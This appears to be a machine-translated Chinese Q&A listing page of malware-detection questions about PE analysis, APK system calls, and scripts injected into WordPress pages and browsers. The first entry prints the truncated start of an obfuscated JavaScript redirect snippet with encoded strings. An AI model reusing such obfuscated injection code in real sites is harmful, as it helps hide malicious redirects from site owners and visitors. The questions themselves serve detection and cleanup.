malware-detection

    -3熱度

    1回答

    var a = ['document', 'window', String]; var b = '108 111 99 97 116 105 111 110'; var c = '%68%74%74%70%73%3a%2f%2f%77%77%77%2e%74%75%6d%62%6c%72%2e%63%6f%6d'; var d = 'ZnJvbUNoYXJDb2Rl'; var e = '

    3熱度

    1回答

    從哪裏可以獲取最新版本的PEiD數據庫?我知道github上有一個版本(https://raw.githubusercontent.com/guelfoweb/peframe/5beta/peframe/signatures/userdb.txt),但它已經超過一年了,它有大約4000個簽名。

    -1熱度

    1回答

    如何從APK中提取API調用/系統調用序列?我已經從APK反編譯了源代碼,現在我想知道是否有一種工具可以從源代碼中提取該應用程序所做的所有系統調用。

    0熱度

    1回答

    我在最近建立的Wordpress網站有一個奇怪的問題,其中當用戶通過搜索引擎(通常是Google)訪問網站頁面之一時,會產生一些奇怪的標記頁腳元素。該標記是鏈接到不存在的存檔頁面的日期的無序列表,以及鏈接到不存在的分類頁面的無序列表。 這裏的奇怪之處在於主題中沒有代碼可以生成這個標記,甚至更奇怪的是,無序列表中的類別不存在於網站的數據庫中。我首先想到的是,這可能是可能的惡意軟件感染的結果,但由於鏈

    2熱度

    1回答

    我們正在尋找提醒用戶是否在加載頁面時發生了代碼注入。我們遇到了JollyWallet注入代碼並導致SCRIPT塊保持打開狀態的問題。當然,我們的代碼在SCRIPT塊中。 以下是我們在原有 sTrailer = "</body></html>" //Used to close popup print view window 這裏是被注入: sTrailer = "<script type="te

    -2熱度

    1回答

    這是我大學給出的項目主題。有人可以給我一個想法,從這個話題開始。 我已經看到很多關於pdf漏洞的主題,但問題是他們需要事先知道很多安全的東西。我有不到一週的時間提交該項目。 如果有人能指導我到我應該開始的地方,我會非常感激。 我已經查過了didier stievens網站,但由於沒有時間,對我來說它變得非常難以理解。

    0熱度

    1回答

    有很多工具可以幫助分析可移植的可執行文件。例如PE Explorer。我們可以加載.exe文件並檢查部分的數量,部分對齊或特定部分的虛擬地址等內容。 是否有任何類似的工具,允許我做同樣的事情,但已經加載到內存中的可移植可執行文件?沒有訪問它的.exe文件? 編輯: 也許我會嘗試澄清什麼,我想要的目的。可以說(像@ 0x90建議),我有兩個應用程序或甚至三個應用程序。 app1.exe - 由用戶執

    3熱度

    2回答

    在我的應用程序中,我正在通過將它們發送到谷歌來檢查用戶輸入的惡意軟件的URL。 要測試得到一個「發現惡意軟件」的反應我使用url http://malware.testing.google.test/testing/malware 令我吃驚的這個URL沒有被標記爲惡意軟件 在擺弄我發現,當我進入結尾的斜線,它確實被認爲是惡意軟件。 在documentation它說url需要被規範化。 你們有沒有人

    3熱度

    1回答

    我最近在我的網站上發佈了一種「公共服務公告」,告訴人們網站上只有一個廣告,它整齊地放置在網站的設計中。 我這樣做是因爲有人舉報該網站爲「不工作」,當問及該問題的屏幕截圖,此爲我提供了: ad-riddled screenshot http://ezimba.com/work/140308C/ezimba19743774066600.png 進一步調查發現是一個問題稱爲「HD Streamer」的惡

    -1熱度

    2回答

    尋求熟悉jquery惡意軟件的任何人的幫助。我在我的WordPress網站中感染了Injected Script,每次我從Header.php中刪除注入的代碼24小時後,它已將修改後的版本注入到我的託管服務器上的Header.php文件中。 讓我瘋狂。該網站是www.icrsolutions.co.uk和腳本下面寫着: <script> var a = ''; setTimeout(10);